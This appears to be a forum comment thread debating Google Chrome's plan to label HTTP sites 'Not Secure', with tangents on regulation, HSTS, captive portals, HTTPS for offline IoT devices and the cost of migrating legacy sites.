Even if that's Google's motivation, I'm OK with the end result. I already use a VPN on my iPhone when on LTE because Verizon's been caught sniffing and manipulating traffic a few too many times. At least I can (and generally) do opt out of using Google's services, so I genuinely appreciate them helping me out of out Verizon's unwelcome inspections.
Wow, I'm genuinely surprised someone managed to spin something like Google advocating for a secure web into a monopoly agenda. I get it, corporations are evil. But not every move. Why can't this simply be something out of goodwill?
I don't think this needs to be seen as a monopoly move. Think of it instead like health inspections for restaurants.
In theory, restaurateurs would hate health inspections, because they're intrusive regulation with no direct benefit. But they have a lot of indirect benefit, in that the safer people feel going to restaurants, the more likely they are to go out to eat.
Similarly, the safer the web is, the better off Google is, because people do more things on the web. That does benefit them, sure, but I don't think it benefits them disproportionately, let alone harms other legitimate competitors.
Source on people eat out more when there are health inspections? I've lived and traveled to many countries where there are no meaningful food inspections whatsoever, and your statement there really does not pass the sniff test. And as an aside there also tend to be far more independent restaurants since if you can cook something well, then all you need do is plop out a table, put up a sign, and you're in business.
I think a cross-country comparison clouds the issue. Think of it this way: if in an American city people started to frequently get sick from poor restaurant hygiene, would you expect them to eat out more, less, or the same? Would you expect them to be more or less willing to try restaurants new to them? My strong bet is on less for both, because people are pretty risk-averse when it comes to vomiting.
This is an interesting conversation to have as I used to feel very similarly, until getting to experience a nation where there are really no rules or regulations on food at all. It's actually what started reshaping my general view towards regulations in general. Think about the implication of your statement/belief. You're implying that the primary reason restaurants aren't making people sick, en masse, is because of rules and regulations.
The restaurant industry is one place where self regulation works surprisingly well. Think about your own experience, as it's true for just about everybody. When you choose to go out you most often go to one of a handful of the same restaurants. What happens if you get sick at a place? You're probably not going back there. And you're also probably going to tell your friends. If you're particularly upset you might even post some less than friendly reviews of the restaurant. That restaurant, with one mistake, converts a high value customer into a one man image destruction machine. And now let's imagine it wasn't a one off, but this restaurant actually makes a significant number of people sick - even if on just one a single day. They're pretty much dead.
All the rules and regulations make it much harder for people to start new restaurants. In most states you're looking at several permits and associated educational courses just to be able to even call yourself a restaurant. And then don't forget to fact in the fees for the permits, the fees for the classes, and plenty of more fees on top of that. Basically you end up having to pay the government a whole lot of money just to be able to sell the food you've probably already been making your friends and family for years if not decades.
And this leads to utterly ridiculous scenes like this [1]. How dare a man try to sell some hotdogs without asking the government for permission. Time to take all the money out of his wallet, fine him, and probably schedule a court date too. By contrast, you can be completely certain that 100% of McDonald's franchises have every single government fee and permit covered inside out. But that does little to stop people ending up with their food being mishandled, and in some cases intentionally. The big thing you'll see in industries with heavy regulation is a trends towards centralization. Here [2] are some actual data on this 'golden age of restaurants', though the ridiculous number of chains itself is more indicative of the issue than a recent slump.
I too have lived in the third world. But I also have cooked in a commercial setting for immune-compromised people, where I found health department guidelines enormously valuable.
> You're implying that the primary reason restaurants aren't making people sick, en masse, is because of rules and regulations.
No. The primary reason restaurants aren't making people sick is good hygiene all along the food supply chain. But good hygiene isn't easy. It gets harder the more industrial your operation gets. And short-term financial incentives cut against it, especially when you're working at scale.
I will happily eat from one of the probably-unlicensed hot dog carts in my neighborhood because a) I can inspect their kitchen, b) I see them around and so can know who's got a track record, c) I can see who's moving a lot of product, and d) they just can't carry a lot of inventory.
But I won't be nearly as casual with restaurants, because there is so much more opportunity for poor hygiene to impact food. Happily, I live in San Francisco, a city with vigorous restaurant inspection, one where the scores are posted physically in every restaurant. Here, I'll try new restaurants at the drop of a hat, because I'm not worried about shitting my guts out, something that happened to me repeatedly in my third-world eating adventures. My folks, who lived in Mexico for many years years, had a complicated set of heuristics around where to go and what dishes were most likely to be safe. Nobody in SF does that.
Your theory is that this is terrible for restaurateurs trying to do new things, but San Francisco is one of the best food cities in the world, with new, bold things opening frequently and often doing quite well. Unregulated sanitation strongly advantages chains, because people know they're getting a safe product. Strongly regulated sanitation enables entrepreneurs, because it removes safety from consideration when looking at a new restaurant.
People opening restaurants here complain about many barriers, but I've never heard one grumble about health code regulation. It's mostly what good cooks do anyhow, so they're happy to be held to a high standard, especially if it disadvantages competitors who would otherwise be cutting corners.
You're putting your head in the sand here. Independent restaurants in the US are dying. This is not based on anecdotal evidence, but national data. And your entire hypothesis that chains thrive on a lack of regulations is similarly completely unsupported by data. Look at the ratios of chains:independent restaurants in countries with extensive rules and regulations on food and then compare that to countries without. If your hypothesis was correct, we'd see domination of chains in countries with minimal rules and regulations, instead it's the unambiguously exact opposite.
Arguably the biggest issue with the regulations is that they're overreaching and extensive to the point that if somebody wants to find a violation, they probably can. And many have very little positive effect. In California the 'CalCode' [1] for food regulations alone is 188 pages of random rules, which regularly change. And that is not an all inclusive document. It regularly references not only itself but also other sources. If you actually put all the rules in their verbose and clear form together, it would likely exceed a thousand pages. And you get these dense rules like:
"FOOD prepackaged in a FOOD FACILITY shall bear a label that complies with the labeling requirements prescribed by the Sherman Food, Drug, and Cosmetic Law (Part 5 (commencing with Section 109875)), 21 C.F.R. 101-Food Labeling, 9 C.F.R. 317-Labeling, Marking Devices, and Containers, and 9 C.F.R. 381-Subpart N Labeling and Containers, and as specified under Sections 114039 and 114039.1. [...Skipping several more lines of rules, this for this single rule...] Except as exempted in the Federal Food, Drug, and Cosmetic Act Section 403(Q)(3)-(5) (21 U.S.C. Sec. 343(q)(3)-(5), incl.), nutrition labeling as specified in 21 C.F.R. 101-Food Labeling and 9 C.F.R. 317 Subpart B Nutrition Labeling."
And that's just one segment of the regulations. If by some miracle you manage to obey every single rule down to the dime in the Calcode, there's then hundreds of other pages of rules and regulations you need to obey. And as mentioned many of these things are completely arbitrary. How deep a sink do you think you need to wash the utensils in a food cart? Would 9 inches do? Obviously that'd be way more than enough, yet that'd be a violation of CalCode giving them sufficient cause to find and/or shut down your business. Some politician somewhere at some time decided all sinks must be at least 10 inches deep. Why? No good reason. Instead of creating common sense regulation, rules and regulations inevitably converge on these obtuse rules. Instead it could be that all utensils and instruments used in food preparation need to be able to be fully cleaned on site. But that'd be too logical.
This is all an enormous burden on individuals starting businesses and serves little purpose other than ensuring we're left with chains and perhaps your 'bold' restaurants, which I assume boils down to a euphemism for overpriced outlets primarily targeting yuppies. It's much easier to afford the full size legal team necessary to navigate all this mess when you have a 4 figure markup on your product!
Fundamentally, I think you're just making a lot of this up to suit your ideological views.
For example: "Would 9 inches do? Obviously that'd be way more than enough, yet that'd be a violation of CalCode giving them sufficient cause to find and/or shut down your business. Some politician somewhere at some time decided all sinks must be at least 10 inches deep. Why? No good reason"
Do you have any data demonstrating this sink issue? I'm betting no. Having cooked commercially, though, I can tell you a deep sink is absolutely necessary to clean well. Is the numeric measurement possibly a little arbitrary? Sure. Most are, but that's better than just "have a pretty deep sink", because you want to install that sink once. You don't want to rip it out later when an inspector says, "Not deep enough, try again."
The people I've met who work on regulatory issues are smart, sincere, and often really want to make things work for users. That's especially true for business regulation, as business owners have the political clout to complain.
I note also that you're energetically conflating restaurants, prepackaged food facilities, and food trucks. Those are all pretty different businesses.
Another example: "This is all an enormous burden on individuals starting businesses"
I doubt it. I know people who have started restaurants, catering companies, and a premade food company. None of them ever have mention this as a particularly big burden. They complain about all sorts of other things. Staff, customers, competitors, and definitely prices from suppliers and landlords. Never one grumble about safety regulations.
As an aside, the reason that many regulations don't seem "common sense" is generally that some asshole found a way to do something bothersome, so they had to add another regulation. For example, in LA people started to effectively run dodgy used-car lots out of public parking on major streets, inconveniencing both people who wanted to park and merchants who wanted customers to park. Last I heard they were looking at a variety of regulatory solutions, none of which would seem "common sense" unless you know the problem. It's the same deal with building codes; many regulations don't make sense until an expert tells you what's up.
And the same applies with software, really. Look at all the things people have to do to make secure software. Many of the rules make no sense unless you have an attacker in mind.
So given that your basic take seems to be, "I, an internet random, think some regulations I know nothing about are dumb," I guess my answer is, "Ok, buddy. Thanks for sharing."
They just engaged in an action that substantially increases their monopoly over access to user information, which is their golden goose. And this action is going to result in some degree of backlash. People hosting information only static sites aren't going to be thrilled that Google is effectively coercing them into, at the minimum, setting up let's encrypt when they have no reason to do so. And of course, this can be seen through some lens as benefiting the public good. Do you really think Occam's Razor points to the second reason as the primary incentive?
Another example from Google would be them preventing you from running plugins on Chrome that were not from the Google store. Yeah, it can be spun to be about protecting users from malicious plugins but it also enhances their control over their users. Incidentally, they decided to ban evil things like Youtube Downloaders from their store as well, which is a far more impactful given their increased level of control 'for your safety.'
> google started Calico because you can't show ads to dead people
good one.
I am not sure why people view it as cynical to assume that for-profit corporations act out of self interest.
Have you ever gotten a company you worked for to authorize spending for something where you didn't justify it in terms of its benefit to the company? Was it millions of dollars like Google has spent on this HTTPS thing?
To assume that Google is not doing this for profit would be to assume that they are incompetent or derelict in their professional duties, and that seems unlikely to me in this case.
"Have you ever gotten a company you worked for to authorize spending for something where you didn't justify it in terms of its benefit to the company?"
Yes, actually, and i was managing enough people that it was a dent (IE xx million a year investment in people alone). That company was, in fact, Google.
"Was it millions of dollars like Google has spent on this HTTPS thing?"
Yes.
"To assume that Google is not doing this for profit would be to assume that they are incompetent or derelict in their professional duties, and that seems unlikely to me in this case."
I'm going to disagree with you based on my experience above :)
Can you explain how you spent millions of dollars on something that had no benefit whatsoever for your company?
Now, you may have done something that had more ephemeral benefits and did not have directly attributable immediate revenue impacts, but I am pretty sure that it benefited your company somehow, and I am pretty sure that you justified the expense in terms of the benefit to your company.
If I am wrong I would be interested to hear the details of this.
"Can you explain how you spent millions of dollars on something that had no benefit whatsoever for your company?"
In what sense? Like why they let me do it? Because they aren't as profit driven as you seem to believe. I'm sure parts are, but not the part i was in. Additionally, the founders and CEO definitely cared more about doing the right thing than trying to eek out another little bit of profit for something.
Unfortunately, it's not public in the particular case i'm referring to, so in that case, you'd just have to trust me.
I have also managed similarly not-profit driven things, that are public, like election information publication (which was also xx million worth of people). This data and work was explicitly kept away from any profit driven part of the company, and not driven, at any level, by a desire to profit (In this case, eric thought we should do it, as did sergey, and they very much wanted it to be done because it was the right thing to do, and didn't want us to care one whit about either the business or goodwill aspects)
I'm sure you will contrive a motive.
But you can contrive all you want, it's basically "your random thoughts" against "the people who actually funded and supported it", and i trust them at their words.
"Now, you may have done something that had more ephemeral benefits and did not have directly attributable immediate revenue impacts, but I am pretty sure that it benefited your company somehow, and I am pretty sure that you justified the expense in terms of the benefit to your company.""
You've moved from claiming, essentially, direct commercial benefit (solidification of monopoly position) to "any benefit at all". I'm pretty sure no matter how i answer you are going to try to contrive benefit out of it.
But i asked explicitly (when dealing with the non-public thing), and the answer all the way up to, as far as i know, Larry, was "no, we should do this because it's the right thing to do, we don't care if it benefits us".
I did not justify the expense in terms of benefit to my company.
As a lawyer, i can also tell you the professional duties you claim are either non-existent or not as absolute as you make them.
Google, and pretty much all corporations, are simply not the black and white things you paint them to be.
(and also, for the record, i actually very much hate corporatism :P)
> As a lawyer, i can also tell you the professional duties you claim are either non-existent or not as absolute as you make them.
"under American law we have a fiduciary responsibility to our shareholders to account for things properly, so if we were, for example, to just arbitrarily decide to pay a different tax rate than we were required to, a more favourable one for example to a particular country, how would we account for that?" - Eric Schmidt on why Google paid "£3.4m in tax on £3.2bn of sales" (.1%)
I'm really unsure what is this comment supposed to add to the discussion. It doesn't respond substantively to any point i made, it's not even relevant to the quote you are responding to, it's not caselaw or legal argumentation, it's a CEO giving a political answer to a question. Is that supposed to be shocking or something? I'm not even sure.
Truthfully, it makes it seem like you aren't even trying to have a real discussion, you just want to grind an axe.
[1] "While the duty to maximize shareholder value may be a useful shorthand for a corporate manager to think about how to act on a day to day basis, this is not legally required or enforceable ….
Under this legal regime, it is not malfeasance for boards or corporate chiefs to make decisions that do not maximize shareholder value."
[2] "Contrary to what many believe, U.S. corporate law does not impose any enforceable legal duty on corporate directors or executives of public corporations to maximize profits or share price" (https://corpgov.law.harvard.edu/2012/06/26/the-shareholder-v...)
[3] There are only two legal duties here. The duty of care and the duty of loyalty. As I said, neither is about maximization of profits, though you will occasionally find courts with loose language around the duty of loyalty. The duty of loyalty's history is about not making money at the corporations expense - you must put the corporation's interests above your own. Transforming that into a "you must maximize profit at all costs" is ... a pretty far step. Again, 99.99% court cases here, and traditional breach of this duty are about either taking a corporate opportunity for yourself or making self-interested transactions.
"A direct quote of Google's long time former CEO making the exact same argument I am seems pretty on topic to me."
It's only on topic because you keep changing topics!
You've now gone and pretty much ignored every point made and just shifted discussion to something else in pretty much every reply.
It's not even the same argument you have made in these replies, as you claim.
(Eric is talking about accountability to shareholders, you started by talking about direct benefit to the business. These are incredibly different things)
So while this has been fun, it doesn't seem very useful or constructive.
"obviously marking password input fields as "NOT SECURE""
- firefox has been doing this for a while, confuses some of my users - I am glad it's there, but wish it did not completely cover the login button on wordpress fields. Very glad there is a "learn more" attached to this.
"Google and others like Mozilla have had to drag many site owners kicking and screaming"
- I was dragged into this by the Google threats. Spent hours on it. Come to find our most popular few pages use a script that just will not function over https - no way to make it happen.
Then I spent hours crafting htaccess rules to make some pages https (home and password pages) - and some pages forced non-https (the 5 pages we have with needed chat script on them) - more hours into updating links on all pages and everything -
then come to find out the browsers have a function where if your home page is https only then it can't pull the sub pages as non-https (maybe it's the other way around, it's been a while) -
So I had to go and undo all the changes. I've been spending time trying to help develop newer chat scripts to have all the functionality of the old one our users prefer - and to no avail. So as google forces https use on sites to be in it's results, and now to not be labeled as insecure - we currently have to choose to remove our most popular functions on our site or lose the google battle completely.
We are still trying to get a newer chat system up and running that has our old familiar functions, but we don't have the resources that google and others have obviously.
We want https so bad, we love, love, love more encryption the better. It just has not been an easy thing for us to implement, and we've tried many things, included pushing our users to newer html5 based chat systems and such. Nothing has panned out quite yet. Fingers crossed we make strides in these areas before it gets worse.
No offense, but this can't have come as a surprise. The writing has been on the wall for a very long time. I'm glad that Google is forcing company's hands here, because it is obvious that if they didn't, some would never "find time" to get it done.
You may want to update the website linked via your HN profile as well. To start with, every page includes unicode replacement characters mixed into the text.
To be completely honest, this kind of counter-argument (not that you are advocating against HTTPS, but bear with we) always reads to me like "people forget passwords, and don't like having to type usernames, so we just rely on the honor system".
Yes, security has downsides, but in my opinion those downsides are well worth it for the benefits.
Personally i wouldn't mind it that much if the browser let me bypass the error but HSTS seems to mean "even if the site would work fine otherwise, keep it broken". There have been several cases where i couldn't bypass such an error in a site that i just wanted to read something and i was very surprised to see that Firefox didn't had any about:config option to indicate that "i know what i am doing, let me in". So much for taking back the web. Seems it was only temporary so we can hand it to Google.
If browsers allowed you to bypass HSTS, then it could be easily defeated by an attacker by breaking the traffic on port 443, forcing the user to disable SSL for the site. What would be the point over regular SSL? HSTS was designed as a response to programs like sslstrip, where the implementation of SSL may be attacked so the user is made vulnerable.
If a website puts out an HSTS header, they are telling the browser they need a higher bar of security than regular SSL.
And if I am a user of that website and am willing to accept the risks, why does Google force me to live with their opinion? HSTS should be bypassable with user consent.
I get the distinction, but it's the browser that enforces the website's opinion, and I'm arguing that the browser should give the user absolute control for those users that want it.
Similarly: I have a static site (no tracking, no PIIs) that's currently hosted on a friend's VPS. HTTPS is out, because they're already using it for something else, and Apache can't know which vhost the user is requesting in time to present appropriate certificate. Maybe there's a workaround for that, but neither I nor my friend know of any, we've both already spent few hours looking, and I do not feel like spending even more time figuring out, or moving it to a dedicated VPS with its own IP.
Basically, on the one hand I'm all happy. On the other hand, I totally do not want to do the work.
And beyond that, all the extra complexity introduced everywhere that you mention, and that I also had happen to me.
If I'm understanding your issue correctly (you have two or more domains on the same IP address), then Server Name Indication (SNI) has worked for a very long time and addresses this for you: https://wiki.apache.org/httpd/NameBasedSSLVHostsWithSNI
Support is at about 97.9% globally: https://caniuse.com/#search=SNI - Effectively every browser released since 2010 plus IE 7 and 8 on Vista.
I'm actually quite shocked that 19 of the top 100 pages still use http by default. For small or internal pages that's fine but top 100 pages on the internet? Any idea which pages they're talking about?
Google's Transparency Report shows a list of which top sites do modern HTTPS by default, which do it but only if you explicitly request the HTTPS site, and which have crappy (e.g. TLS 1.0 only, or they require 3DES) cryptography, and which have nothing at all.
The last category features many Chinese sites. I could speculate about why that is, maybe the Great Firewall gives citizens no reason to bother trying to achieve security, maybe Chinese culture opposes privacy, maybe everybody in China is running Windows 95 still. But whatever the reason, that's an observable fact.
There's also a whole bunch of crappy British tabloid newspapers there. Given their print editions are specifically printed on the worst quality paper that will take print ink, and they are routinely accused of "gutter" journalism, perhaps it isn't a surprise that defending their reputations through the use of encryption isn't a priority? Or you know, maybe British culture... British great firewall... etcetera. No idea.
Fine, as long as they don't eventually make it difficult or impossible to ignore the warnings (as they've done with SSL sites with invalid certs). I have numerous devices with web interfaces that are 100% internal to my network and not reachable from the open Internet, but Chrome still refuses to let me access them (side note: thanks, Firefox, for respecting my decision as a user!). I can envision a near future where Chrome treats HTTP sites the same way.
You can still visit websites that have an invalid CA or invalid certificate DNS match, but if the website is set up for HSTS/HSTS preload then chrome respects the website's decision to not allow insecure connections.
I was accessing an internal router with firmware from the distance past of 2011. Note that this is an internal-only router that connects a couple of trusted subnets, so security isn't an issue and there's no requirement to replace it yet. The problem that bit me yesterday was that I literally could not find a way to get Chrome to open https://ro.ut.er.ip/ because the router's ancient cert is invalid.
I would have been perfectly fine with Chrome alerting me to that fact and providing a "click here to continue anyway" link, but that seems to no longer be an option. FWIW, Safari did the exact same thing. Only Firefox gave me the "I promise that's really what I want to do step aside plz" button I needed.
I hope you’re joking...? An interface that forbids you from working unless you know an easter-egg/“insider” password is almost a fascist concept. I guess that’s another reason not to use Chrome...
For HSTS, it’s based on the spec. There’s not supposed to be a user-accessible override for HSTS errors, which is why Chrome hides it behind that easter egg. Firefox has no override of any kind.
Yeah, it's annoying having to older versions. However there's good reason they disabled the ability via a config or launch parameter. Many organisations were not making upgrades to internal systems and websites as they could allow their browsers to bypass validation.
Still sucks for consumer grade stuff. I'm surprised your router offers SSL at all though.
>Many organisations were not making upgrades to internal systems and websites as they could allow their browsers to bypass validation.
That's like shutting down all roads because some drivers break the speed limit. If Google isn't taking collateral damage into their decisions that impact everyone, they need to stop controlling the web.
I had this problem with a firewall (sonicwall) and I ended up SSHing into the firewall and then allowing regular http traffic (because literally none of the browsers on my computer: ie11, firefox, or chrome would load it.)
The problem is when Google goes and throws a commonly used internal-only TLD like .dev in their HSTS list. And of course, the whole problem that HSTS is the hosts file all over again.
That being said, the real fault in that incident is ICANN selling .dev in the first place. They should've been well aware of it's common use, and opted not to sell it.
I think you're putting too much thought into it. It's very simple: .dev is a massively easy to monetize TLD, it was guaranteed to get multiple companies trying to buy it, and when they had multiple offers, they got auctioned.
I think .dev was just too much money for ICANN to say no.
Of course, it looks like ICANN may have gotten screwed, because Amazon and Google appear to have privately arranged to figure out who was going for which TLDs: https://icannwiki.org/.dev
Can you self-sign a certificate from the internal server and install it as trusted on the work computers? Or does Chrome only trust certificates that Google trusts?
Generally speaking, Chrome uses whatever is in the OS trust store, with certain exceptions for CAs that have been naughty (e.g. StartCom, WoSign, Symantec) or subCAs that were revoked via CRLSets. Private CAs present in the OS trust store will generally just work, the only exceptions being things like Superfish.
One small annoyance/drawback with everything moving to https: I travel a fair bit, and hotel wifi usually relies on users connecting to their AP and then using a DNS-based redirect to send the user to the login page. That only happens when on http, as https sites which are redirected get the MITM warning from the browser. I used to be able to just type in "google.com" in the address bar and be redirected accordingly; nowadays I struggle to remember a site I use which isn't https. Looking up the gateway address is kind of a pain too.
No, worst case you'll see a security warning. Or chrome will add an exception for such a site. This is a well known problem that I'm sure will be addressed. But with the current state of the web (~20% unencrypted) it's not really an issue yet.
example.com has SSL: https://example.com/ -- so may one day default to using that. I'd really recommend http://neverssl.com/ for this purpose. The homepage explains it's literally designed for situations like captive portals.
neverssl.com is not IANA reserved, but a) typing in "example.com" into a browser may default to https in the future, instead of http, and b) no IANA or RFC guarantees that example.com won't redirect in the future anyway.
Windows 10 detects this by trying to go to msftconnecttest.com in a browser if it detects using some heuristics that the wifi requires signin which should redirect you to the wifi signin page. Android also detects this as well by going to some Google-owned page that redirects you to the wifi signin if it detects that it is needed. What are you using that this is still a problem?
iOS and macOS both have captive-portal detection (in fact I think they pioneered it) but it's not 100% fool-proof and sometimes doesn't show up when it should.
Also supposedly some captive portals trap the well-known URLs used by captive portal detection for whatever reason (which is why Apple uses a huge list of seemingly-random domains)
But the browser could default that to https since that's allowed. If you use a real domain that has no https equivalent you should be safer (neverssl.com is one of those).
This totally sucks for web based services and sites which don't have a (user friendly) chance to use HTTPS.
Think of LAN only IoT devices which aren't proxy through a external company site, have no domain, are accessed through (local area network IP) and maybe run in non internet environment.
I wish there was a solution for web based encryption for this application domain and browser vendors start to think out of their internet only box. ... same goes for service workers.
Unfortunately, this is a problem that will never go away, no matter how slowly and gracefully we transition. There is no alternative that allows these devices to continue to operate without friction that doesn’t also enable current device manufacturers to kick the can down the road by releasing new HTTP-only devices.
If we want to keep making the web a safer place, these kinds of cutoffs have to happen. Infinite backward compatibility simply holds everyone back for the sake of decreasingly-relevant devices and irresponsible manufacturers of new hardware and the customers who purchase their products.
so the solution to the warning is to make your offline IoT devices secure, but how do you actually do that? i have an IoT product that runs a web server and needs to be accessible by users when the internet connection isn't available. how do I enable HTTPS on it? (this is not a hypothetical. it's a problem i actually need to solve)
as far as i can tell, my options are:
- install a self-signed cert on the device and force my users to click through all the warnings chrome throws up about untrusted certs
- create my own CA cert and sign the cert with that, and convince the user to install my CA cert as a trusted cert (which is not possible on iOS)
- get a cert signed by a trusted authority, and get the user to add an entry to their /etc/hosts file that maps the domain the cert is valid for whatever address the device is assigned
- distrubute a native (electron?) app that interfaces with my device and trusts my cert, and disallow direct browser access.
- find some sketchy SSL issuer who is willing to issue certs for *.local domains and run an mDNS resolver on my device
- Use HTTP instead of HTTPS and the only downside is a little badge in the address bar saying "not secure"
I'd love to have HTTPS everywhere, but i honestly don't know how to make it happen.
> - distrubute a native (electron?) app that interfaces with my device and trusts my cert, and disallow direct browser access.
This is the most secure choice, using something like websockets to transfer data only.
Unless your product is completely offline and never connected to the internet, I don't think an IoT device that runs a web server is ever a good idea. All it takes is one successful remote attack, and soon your users could be installing ransomware at the device's direction!
Don't serve HTML/JS from a device that you can't physically pull the plug on.
I'm not sure how your comment is supposed to help.
I don't think a web server is ever a good idea. All it takes is one successful remote attack and soon your users could be installing ransomware! We'd better shut down the internet.
I have dnsmasq running internally and my regular Netgear router gives out the IP of that internal host as the dns resolver. Local hosts are given subdomain names for a domain I control (pi3.example.com camera.example.com seedbox.example.com etc) and resolve to an internal IP. These domains resolve, on the public internet, to the one publically-accessable host in my network. That machine runs certbot and gets the cert. It then rsyncs the certs to the internal machines every renewal.
They should be doing the same thing for Javascript then. Release a version of Javascript without the crappy bits and not run the old version of Javascript.
> Think of LAN only IoT devices which aren't proxy through a external company site, have no domain, are accessed through (local area network IP) and maybe run in non internet environment.
As long as it's a “Not Secure” omnibox warning, I don't see it as a problem even there. Now, if they adopted the “block with non-obvious escape hatch” approach used for certificate errors for HTTP, that would be a problem.
I didn't read anything in the article that said that HTTP will stop working, only that it'll be marked as not secure in the new Chrome. If you understand the security risks involved and are okay with continued use of bare HTTP, it shouldn't make any difference to you.
the future of IoT is HTTPS with client side X.509 authentication. you don’t need internet to make that happen. but if you are web based and not using HTTPS... i can only ask why not? internal CAs are free
all you need is a certificate on the device and an app in the app store. or an installer they can download to their computer. you don’t need a full on traditional CA. you just need to verify (one) certificates.
sign the certificate in the manufacturing plant and put it in the coffee maker l. give the CA cert out in the app or the installer. now you can verify if the coffee maker talking to you over HTTPS is legit and probably get it’s serial number off the cert too. your CA keys never see the public. you could go even more secure and use that as a bootstrap to a per customer CA and generate a new cert on install, but this is a coffee maker right?
What app store? Which OS? Do you now suddenly have to write software for all OSes to install the certificate? Something that you didn't even have to think about doing before. The entire reason you went for a webui to begin with.
That is a generalization. You certainly do with many networked appliances. And I prefer this, since that means connectivity with the device is not dependent on some cloud service. And that some cloud service can't control my appliance.
It's impossible to get a valid SSL certificate for an appliance running within someone their lan, without having to open ports. And opening ports would make the appliance even more vulnerable to attack.
Now that fully automated certificate issuance is becoming more mainstream (thanks to Let's Encrypt) I foresee this sort of thing becoming much more common in the future.
Unless I'm misunderstanding they did that by partnering with a CA. Becoming a semi-trusted CA themselves. This is not an option for most organizations.
That was only necessary because, at the time, there was no other way to get a large number of wildcard certs issued for their domain in an automated fashion.
With ACME that will no longer be the case. Let's Encrypt will allow you to do basically the same thing for free with ~20 devices a week[1] starting on February 27[2], for example. In the future, commercial CAs may choose to offer similar services with more relaxed rate limits.
It's possible, why not? Just use your own servers as a cert signing service for your IoT device as part of the bootstrap process if you are unwilling to have any services running on it. Or ship the device with the signed cert. You can have the host name in the DNS even though it's not accessible from everywhere.
> Can you not just create a certificate and push it to the system as a trusted cert?
If you were to control the user's machine, yes. But imagine you bought a shiny new internet connected coffee pot. Once you turn it on it does the following:
1. Coffeepot Determines its LAN IP address (e.g. 192.168.1.100)
2. Coffeepot connects to the coffeepot cloud service to register a dynamic DNS entry (e.g. user1.coffeepot.com) to point to its LAN IP address.
3. User is told they can access their coffeepot WebUI by going to user1.coffeepot.com, which resolves to 192.168.1.100
This is secure since the coffeepot can only be controlled if you are in the same network. Yet, since the coffeepot webui can only be reached if you are in its network, it is nearly impossible to get a valid SSL certificate on the coffeepot appliance.
> Presumably there is already some sort of communication going on if they're receiving Chrome updates.
There is a difference between outgoing network traffic and incoming network traffic. Only the latter requires open ports.
3. Coffeepot fails to connect to the cloud service because it's in some remote place with no internet.
Why does the coffeepot / TV / thermostat need internet access? That's often undesirable for the user (because that means the whole things breaks if the originating company goes away). Not to mention, how would the user know which host to connect to? How would the device get on WiFi if there is no way to enter the password?
I know Chromecast does this by making you download a custom application (Google Home on a phone, or Chrome on a desktop); that's not always practical.
I do think SSL in as many places as possible is great; I just also think they're trying to push for too much before solving the problems it will cause first.
It doesn't need it. You can always just nmap your network, find its lan ip and connect straight through that over http. But that's not very user friendly, hence the dyndns.
2.alternative: Coffeepot connects to the coffeepot cloud service to register a dynamic DNS entry (e.g. user1.coffeepot.com) to point to its LAN IP address and sends a Certificate Signing Request for user1.coffeepot.com?
If you are already registering a dynamic DNS, a CSR shouldn't be that much additional overhead?
Actually, now that I think about it, with the Let's Encrypt DNS challenge this might actually be viable... That's pretty recent, though. And they rate limit harshly. I was thinking about the HTTP validation, which would definitely fail, due to the DNS resolving to a LAN IP. Which a CA would obviously not be able to verify.
Right, that burden becomes coffeepot.com's. Supposedly they would already be doing due diligence to make sure that the dynamic DNS requests were from legitimate coffeepots that they themselves manufactured (rather than say the fraudulent activities of a botnet using their open DNS for communications). At that point they should also have enough security information to verify if they should sign a certificate presented to them by their manufactured coffeepot under their certificate authority delegation to *.coffeepot.com.
To my knowledge you can even piggy back off of ACME's protocol work from Let's Encrypt, even if the auth/validation checks are different for the different security models.
It's certainly possible to pay for such a thing today; many of our friends in Fortune 50+ companies have access to such things. You are right that we mere mortals with dreams of a tiny coffeepot IoT empire over HTTPS must hope for the post-Let's Encrypt era that the cost of such delegating certificate authority certificates drops in commensurate to other certificate types.
So much work for so many people to update so many old websites that will see absolutely zero benefit from serving content via ssl.
I have an old travel blogging site with a few hundred thousand posts in read only mode. Thinking about how much work it was to upgrade my other sites to https, chase down and work around every http request in the code base, purchase and install certs for silly things like cloudfront that you wouldn't think would suck away two days of your life.
I'll probably just let the site die in July. It doesn't make money, so it's going to be a tough decision whether to dump thousands of dollars of otherwise billable time into upgrading it to accommodate google's silly whim.
It makes me a bit sad to hear you are distressed from this news. Would you like some help setting up SSL? We could go over Certbot & Let's Encrypt, as well as provide some advice on things like HSTS, Mixed Content, etc...
My email address is in my profile. I'm happy to help you however I can. I may not be able to make any code-level changes, but there may not be much work that needs to be done.
Edit: I just saw your comment https://news.ycombinator.com/item?id=16338576 -- I understand there's potentially a lot of one-time work, but it could be done very gradually, and with this announcement, I think CDNs and widget makers would adopt SSL as well. Once the site does support SSL, you can make SSL-related upgrades (like disabling old ciphers or protocol versions) without much disruption.
Could you help me understand scenarios where Let's Encrypt and CloudFlare SSL won't suffice? They have, e.g. added wildcard support now, so that's another angle covered.
I have sites on Azure and I could add CloudFlare SSL, but it's some work to make that happen and I will have to do it now for all my static sites that absolutely do not need TLS (no forms, no cookies, no javascript).
Or else I have to pay for a cert, a cert is still like $10-$20 per year, per site so that is a lot of money if you have a lot of static sites compared to what the site costs to host (which is near-to-nothing).
And for other shared hosting solutions I'm not really sure if it's possible to implement CloudFlare SSL (I have never implemented it so I'm not really sure what's required)? Why I don't want Cloudflare is because that is adding a third party just because google said I must or I will get punished for it.
Hopefully Azure will implement some solution to provide SSL for free. I suspect with this announcement, free SSL may get more attention on hosting providers. There's already several tickets open on the Azure feedback website: https://feedback.azure.com/forums/170024-additional-services... -- this problem may go away mostly by itself if it continues to get easier every year.
Google isn't making you do anything, merely notifying users that the connection to your website is not secure.
This! When I was on a cheap shared and hosted solution the idea of LE was waaayyy above me.
But, I moved over everything to AWS, for the same amount of money (OK, ~$0.60 more than what I was paying before - relatively nothing), and it became a piece of cake.
That initial time commitment to the move, though, will never be recouped. I do however look at it as a career-expanding experience (fairly confident in how AWS works for projects/companies), so I got that going for it.
You could always consider a free service like Cloudflare which can sit in front of your site and serve the site via SSL to your customers. Yes, it's still unencrypted between CF and your site, however it would resolve the poor "insecure" UX.
As a bonus, CF also has functionality that can re-write http uri's to https.
If you do what you describe, the site will load minus all of its imagery and scripts, since those will be linked from a CDN as http://img.whatever.com/ or whatever. Anything linked with a full URL, nomatter how deep in your codebase will surface at some point in the future and throw up a scary warning for your users.
And you get to find homes for those 3rd party scripts hosted on http only domains.
And in my case I'll probably get to rewrite a Google Maps integration because that will have taken the opportunity to deprecate something important.
There really is a ton of work to pull this off. For every site on the internet more than a few years old.
And again, for zero benefit whatsoever except to clear the scary warning that Google plans on introducing.
